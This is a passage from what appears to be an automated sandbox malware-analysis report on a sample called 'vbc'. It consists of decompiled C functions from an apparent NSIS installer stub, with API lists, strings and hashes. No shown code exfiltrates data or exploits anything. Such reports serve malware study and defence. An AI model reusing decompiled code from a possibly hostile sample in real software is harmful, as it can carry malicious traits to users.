                                                										__eflags = _a8;
                                                										if(_a8 != 0) {
                                                											goto L26;
                                                										}
                                                										goto L24;
                                                									}
                                                									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                									__eflags = _t63;
                                                									if(_t63 == 0) {
                                                										goto L26;
                                                									}
                                                									goto L22;
                                                								}
                                                								goto L26;
                                                							}
                                                							GetSystemDirectoryW(_t108, 0x400);
                                                							goto L26;
                                                						} else {
                                                							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                							if( *_t108 != 0) {
                                                								L27:
                                                								if(_v16 == 0x1a) {
                                                									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                								}
                                                								goto L29;
                                                							}
                                                							E0040657A(_t77, _t105, _t108, _t108, _v16);
                                                							L26:
                                                							if( *_t108 == 0) {
                                                								goto L29;
                                                							}
                                                							goto L27;
                                                						}
                                                					}
                                                					goto L43;
                                                				}
                                                			}





























                                                0x0040657a
                                                0x0040657a
                                                0x0040657a
                                                0x00406580
                                                0x00406585
                                                0x00406596
                                                0x00406596
                                                0x0040659e
                                                0x0040659f
                                                0x004065a0
                                                0x004065a1
                                                0x004065a4
                                                0x004065ac
                                                0x004065ae
                                                0x004065bf
                                                0x004065c2
                                                0x004065c2
                                                0x004065c6
                                                0x004065cc
                                                0x004065cf
                                                0x004067aa
                                                0x004067aa
                                                0x004067b5
                                                0x004067c1
                                                0x004067c1
                                                0x00000000
                                                0x004065d5
                                                0x004065da
                                                0x004065ef
                                                0x004065f0
                                                0x004065f6
                                                0x00406788
                                                0x00406796
                                                0x00406799
                                                0x00406799
                                                0x0040678a
                                                0x0040678d
                                                0x00406790
                                                0x00406792
                                                0x00406792
                                                0x0040679b
                                                0x0040679b
                                                0x004067a1
                                                0x004067a4
                                                0x004065d7
                                                0x00000000
                                                0x004065d7
                                                0x00000000
                                                0x004067a4
                                                0x004065fc
                                                0x004065ff
                                                0x0040660e
                                                0x00406615
                                                0x00406621
                                                0x00406624
                                                0x00406627
                                                0x00406628
                                                0x0040662d
                                                0x00406633
                                                0x00406636
                                                0x00406639
                                                0x0040672c
                                                0x00406731
                                                0x00406764
                                                0x00406769
                                                0x0040676e
                                                0x00406773
                                                0x00406773
                                                0x00406778
                                                0x0040677e
                                                0x00406781
                                                0x00000000
                                                0x00406781
                                                0x00406733
                                                0x00406736
                                                0x00406739
                                                0x0040674e
                                                0x00406755
                                                0x0040673b
                                                0x00406742
                                                0x00406742
                                                0x0040675d
                                                0x00406760
                                                0x00406724
                                                0x00406725
                                                0x00406725
                                                0x00000000
                                                0x00406760
                                                0x00406646
                                                0x0040664a
                                                0x0040664a
                                                0x0040664b
                                                0x0040664d
                                                0x0040668a
                                                0x0040668d
                                                0x0040669d
                                                0x004066a0
                                                0x004066a8
                                                0x004066ae
                                                0x004066ae
                                                0x00406709
                                                0x00406709
                                                0x0040670b
                                                0x00000000
                                                0x00000000
                                                0x004066b2
                                                0x004066b7
                                                0x004066b8
                                                0x004066ba
                                                0x004066d1
                                                0x004066df
                                                0x004066e5
                                                0x004066e7
                                                0x00406705
                                                0x00406705
                                                0x00406705
                                                0x00000000
                                                0x00406705
                                                0x004066ed
                                                0x004066f6
                                                0x004066f9
                                                0x004066ff
                                                0x00406703
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406703
                                                0x004066cb
                                                0x004066cd
                                                0x004066cf
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004066cf
                                                0x00000000
                                                0x00406709
                                                0x00406695
                                                0x00000000
                                                0x0040664f
                                                0x0040666d
                                                0x00406676
                                                0x00406713
                                                0x00406717
                                                0x0040671f
                                                0x0040671f
                                                0x00000000
                                                0x00406717
                                                0x00406680
                                                0x0040670d
                                                0x00406711
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406711
                                                0x0040664d
                                                0x00000000
                                                0x004065da

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll,00000000,00000000,00425A20,74EC110C), ref: 004066A8
                                                • lstrcatW.KERNEL32 ref: 0040671F
                                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll,00000000), ref: 00406779
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 4260037668-1389479307
                                                • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                				struct tagLOGBRUSH _v16;
                                                				long _t39;
                                                				long _t41;
                                                				void* _t44;
                                                				signed char _t50;
                                                				long* _t54;
                                                
                                                				if(_a4 + 0xfffffecd > 5) {
                                                					L18:
                                                					return 0;
                                                				}
                                                				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                					goto L18;
                                                				} else {
                                                					_t50 = _t54[5];
                                                					if((_t50 & 0xffffffe0) != 0) {
                                                						goto L18;
                                                					}
                                                					_t39 =  *_t54;
                                                					if((_t50 & 0x00000002) != 0) {
                                                						_t39 = GetSysColor(_t39);
                                                					}
                                                					if((_t54[5] & 0x00000001) != 0) {
                                                						SetTextColor(_a8, _t39);
                                                					}
                                                					SetBkMode(_a8, _t54[4]);
                                                					_t41 = _t54[1];
                                                					_v16.lbColor = _t41;
                                                					if((_t54[5] & 0x00000008) != 0) {
                                                						_t41 = GetSysColor(_t41);
                                                						_v16.lbColor = _t41;
                                                					}
                                                					if((_t54[5] & 0x00000004) != 0) {
                                                						SetBkColor(_a8, _t41);
                                                					}
                                                					if((_t54[5] & 0x00000010) != 0) {
                                                						_v16.lbStyle = _t54[2];
                                                						_t44 = _t54[3];
                                                						if(_t44 != 0) {
                                                							DeleteObject(_t44);
                                                						}
                                                						_t54[3] = CreateBrushIndirect( &_v16);
                                                					}
                                                					return _t54[3];
                                                				}
                                                			}









                                                0x00404512
                                                0x004045c8
                                                0x00000000
                                                0x004045c8
                                                0x00404523
                                                0x00404527
                                                0x00000000
                                                0x00404541
                                                0x00404541
                                                0x0040454a
                                                0x00000000
                                                0x00000000
                                                0x0040454c
                                                0x00404558
                                                0x0040455b
                                                0x0040455b
                                                0x00404561
                                                0x00404567
                                                0x00404567
                                                0x00404573
                                                0x00404579
                                                0x00404580
                                                0x00404583
                                                0x00404586
                                                0x00404588
                                                0x00404588
                                                0x00404590
                                                0x00404596
                                                0x00404596
                                                0x004045a0
                                                0x004045a5
                                                0x004045a8
                                                0x004045ad
                                                0x004045b0
                                                0x004045b0
                                                0x004045c0
                                                0x004045c0
                                                0x00000000
                                                0x004045c3

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 87%
                                                			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                				intOrPtr _t65;
                                                				intOrPtr _t66;
                                                				intOrPtr _t72;
                                                				void* _t76;
                                                				void* _t79;
                                                
                                                				_t72 = __edx;
                                                				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                				_t65 = 2;
                                                				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                				_t66 = E00402D84(_t65);
                                                				_t79 = _t66 - 1;
                                                				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                				if(_t79 < 0) {
                                                					L36:
                                                					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                                                				} else {
                                                					__ecx = 0x3ff;
                                                					if(__eax > 0x3ff) {
                                                						 *(__ebp - 0x44) = 0x3ff;
                                                					}
                                                					if( *__edi == __bx) {
                                                						L34:
                                                						__ecx =  *(__ebp - 0xc);
                                                						__eax =  *(__ebp - 8);
                                                						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                						if(_t79 == 0) {
                                                							 *(_t76 - 4) = 1;
                                                						}
                                                						goto L36;
                                                					} else {
                                                						 *(__ebp - 0x38) = __ebx;
                                                						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
                                                						if( *(__ebp - 0x44) > __ebx) {
                                                							do {
                                                								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
                                                										__eax = __ebp - 0x50;
                                                										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                											goto L34;
                                                										} else {
                                                											goto L21;
                                                										}
                                                									} else {
                                                										goto L34;
                                                									}
                                                								} else {
                                                									__eax = __ebp - 0x40;
                                                									_push(__ebx);
                                                									_push(__ebp - 0x40);
                                                									__eax = 2;
                                                									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                									if(__eax == 0) {
                                                										goto L34;
                                                									} else {
                                                										__ecx =  *(__ebp - 0x40);
                                                										if(__ecx == __ebx) {
                                                											goto L34;
                                                										} else {
                                                											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                											 *(__ebp - 0x4c) = __ecx;
                                                											 *(__ebp - 0x50) = __eax;
                                                											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                												L28:
                                                												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                											} else {
                                                												__ebp - 0x50 = __ebp + 0xa;
                                                												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                													L21:
                                                													__eax =  *(__ebp - 0x50);
                                                												} else {
                                                													__edi =  *(__ebp - 0x4c);
                                                													__edi =  ~( *(__ebp - 0x4c));
                                                													while(1) {
                                                														_t22 = __ebp - 0x40;
                                                														 *_t22 =  *(__ebp - 0x40) - 1;
                                                														__eax = 0xfffd;
                                                														 *(__ebp - 0x50) = 0xfffd;
                                                														if( *_t22 == 0) {
                                                															goto L22;
                                                														}
                                                														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                														__edi = __edi + 1;
                                                														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                														__eax = __ebp + 0xa;
                                                														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                															continue;
                                                														} else {
                                                															goto L21;
                                                														}
                                                														goto L22;
                                                													}
                                                												}
                                                												L22:
                                                												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                													goto L28;
                                                												} else {
                                                													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                														} else {
                                                															__ecx =  *(__ebp - 0xc);
                                                															__edx =  *(__ebp - 8);
                                                															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                														}
                                                														goto L34;
                                                													} else {
                                                														__ecx =  *(__ebp - 0xc);
                                                														__edx =  *(__ebp - 8);
                                                														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                														 *(__ebp - 0x38) = __eax;
                                                														if(__ax == __bx) {
                                                															goto L34;
                                                														} else {
                                                															goto L26;
                                                														}
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                								goto L37;
                                                								L26:
                                                								__eax =  *(__ebp - 8);
                                                							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                						}
                                                						goto L34;
                                                					}
                                                				}
                                                				L37:
                                                				return 0;
                                                			}








                                                0x004026ec
                                                0x004026ee
                                                0x004026f1
                                                0x004026f3
                                                0x004026f6
                                                0x004026fb
                                                0x004026ff
                                                0x00402702
                                                0x00402705
                                                0x00402c2a
                                                0x00402c2d
                                                0x0040270b
                                                0x0040270b
                                                0x00402712
                                                0x00402714
                                                0x00402714
                                                0x0040271a
                                                0x0040287e
                                                0x0040287e
                                                0x00402881
                                                0x00402886
                                                0x004015b6
                                                0x0040292e
                                                0x0040292e
                                                0x00000000
                                                0x00402720
                                                0x00402721
                                                0x0040272c
                                                0x0040272f
                                                0x0040273b
                                                0x0040273f
                                                0x004027d7
                                                0x004027ef
                                                0x004027ff
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402745
                                                0x00402745
                                                0x00402748
                                                0x00402749
                                                0x0040274c
                                                0x00402751
                                                0x00402758
                                                0x00402760
                                                0x00000000
                                                0x00402766
                                                0x00402766
                                                0x0040276b
                                                0x00000000
                                                0x00402771
                                                0x00402771
                                                0x00402779
                                                0x0040277c
                                                0x0040277f
                                                0x0040283a
                                                0x00402841
                                                0x00402785
                                                0x0040278b
                                                0x00402797
                                                0x00402801
                                                0x00402801
                                                0x00402799
                                                0x00402799
                                                0x0040279c
                                                0x0040279e
                                                0x0040279e
                                                0x0040279e
                                                0x004027a1
                                                0x004027a6
                                                0x004027a9
                                                0x00000000
                                                0x00000000
                                                0x004027ab
                                                0x004027ae
                                                0x004027bc
                                                0x004027c2
                                                0x004027d0
                                                0x00000000
                                                0x004027d2
                                                0x00000000
                                                0x004027d2
                                                0x00000000
                                                0x004027d0
                                                0x0040279e
                                                0x00402804
                                                0x00402807
                                                0x00000000
                                                0x00402809
                                                0x0040280e
                                                0x0040284f
                                                0x00402871
                                                0x00402878
                                                0x0040285d
                                                0x0040285d
                                                0x00402860
                                                0x00402863
                                                0x00402866
                                                0x00402866
                                                0x00000000
                                                0x00402817
                                                0x00402817
                                                0x0040281a
                                                0x0040281d
                                                0x00402823
                                                0x00402827
                                                0x0040282a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040282a
                                                0x0040280e
                                                0x00402807
                                                0x0040277f
                                                0x0040276b
                                                0x00402760
                                                0x00000000
                                                0x0040282c
                                                0x0040282c
                                                0x0040282f
                                                0x00402838
                                                0x00000000
                                                0x0040272f
                                                0x0040271a
                                                0x00402c33
                                                0x00402c39

                                                APIs
                                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                  • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
                                                • API String ID: 163830602-2366072709
                                                • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E004067C4(WCHAR* _a4) {
                                                				short _t5;
                                                				short _t7;
                                                				WCHAR* _t19;
                                                				WCHAR* _t20;
                                                				WCHAR* _t21;
                                                
                                                				_t20 = _a4;
                                                				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                					_t20 =  &(_t20[4]);
                                                				}
                                                				if( *_t20 != 0 && E00405E83(_t20) != 0) {
                                                					_t20 =  &(_t20[2]);
                                                				}
                                                				_t5 =  *_t20;
                                                				_t21 = _t20;
                                                				_t19 = _t20;
                                                				if(_t5 != 0) {
                                                					do {
                                                						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
                                                							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                							_t19 = CharNextW(_t19);
                                                						}
                                                						_t20 = CharNextW(_t20);
                                                						_t5 =  *_t20;
                                                					} while (_t5 != 0);
                                                				}
                                                				 *_t19 =  *_t19 & 0x00000000;
                                                				while(1) {
                                                					_push(_t19);
                                                					_push(_t21);
                                                					_t19 = CharPrevW();
                                                					_t7 =  *_t19;
                                                					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                						break;
                                                					}
                                                					 *_t19 =  *_t19 & 0x00000000;
                                                					if(_t21 < _t19) {
                                                						continue;
                                                					}
                                                					break;
                                                				}
                                                				return _t7;
                                                			}








                                                0x004067c6
                                                0x004067cf
                                                0x004067e6
                                                0x004067e6
                                                0x004067ed
                                                0x004067f9
                                                0x004067f9
                                                0x004067fc
                                                0x004067ff
                                                0x00406804
                                                0x00406806
                                                0x0040680f
                                                0x00406813
                                                0x00406830
                                                0x00406838
                                                0x00406838
                                                0x0040683d
                                                0x0040683f
                                                0x00406842
                                                0x00406847
                                                0x00406848
                                                0x0040684c
                                                0x0040684c
                                                0x0040684d
                                                0x00406854
                                                0x00406856
                                                0x0040685d
                                                0x00000000
                                                0x00000000
                                                0x00406865
                                                0x0040686b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040686b
                                                0x00406870

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-3083651966
                                                • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
                                                				long _v8;
                                                				signed char _v12;
                                                				unsigned int _v16;
                                                				void* _v20;
                                                				intOrPtr _v24;
                                                				long _v56;
                                                				void* _v60;
                                                				long _t15;
                                                				unsigned int _t19;
                                                				signed int _t25;
                                                				struct HWND__* _t28;
                                                
                                                				_t28 = _a4;
                                                				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                				if(_a8 == 0) {
                                                					L4:
                                                					_v56 = _t15;
                                                					_v60 = 4;
                                                					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                					return _v24;
                                                				}
                                                				_t19 = GetMessagePos();
                                                				_v16 = _t19 >> 0x10;
                                                				_v20 = _t19;
                                                				ScreenToClient(_t28,  &_v20);
                                                				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                				if((_v12 & 0x00000066) != 0) {
                                                					_t15 = _v8;
                                                					goto L4;
                                                				}
                                                				return _t25 | 0xffffffff;
                                                			}














                                                0x00404e62
                                                0x00404e6f
                                                0x00404e75
                                                0x00404eb3
                                                0x00404eb3
                                                0x00404ec2
                                                0x00404ec9
                                                0x00000000
                                                0x00404ecb
                                                0x00404e77
                                                0x00404e86
                                                0x00404e8e
                                                0x00404e91
                                                0x00404ea3
                                                0x00404ea9
                                                0x00404eb0
                                                0x00000000
                                                0x00404eb0
                                                0x00000000

                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                • GetMessagePos.USER32 ref: 00404E77
                                                • ScreenToClient.USER32(?,?), ref: 00404E91
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                				short _v132;
                                                				int _t11;
                                                				int _t20;
                                                
                                                				if(_a8 == 0x110) {
                                                					SetTimer(_a4, 1, 0xfa, 0);
                                                					_a8 = 0x113;
                                                				}
                                                				if(_a8 == 0x113) {
                                                					_t20 =  *0x41ea18; // 0x283e7
                                                					_t11 =  *0x42aa24;
                                                					if(_t20 >= _t11) {
                                                						_t20 = _t11;
                                                					}
                                                					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                					SetWindowTextW(_a4,  &_v132);
                                                					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                				}
                                                				return 0;
                                                			}






                                                0x00402fa3
                                                0x00402fb1
                                                0x00402fb7
                                                0x00402fb7
                                                0x00402fc5
                                                0x00402fc7
                                                0x00402fcd
                                                0x00402fd4
                                                0x00402fd6
                                                0x00402fd6
                                                0x00402fec
                                                0x00402ffc
                                                0x0040300e
                                                0x0040300e
                                                0x00403016

                                                APIs
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402FE6
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
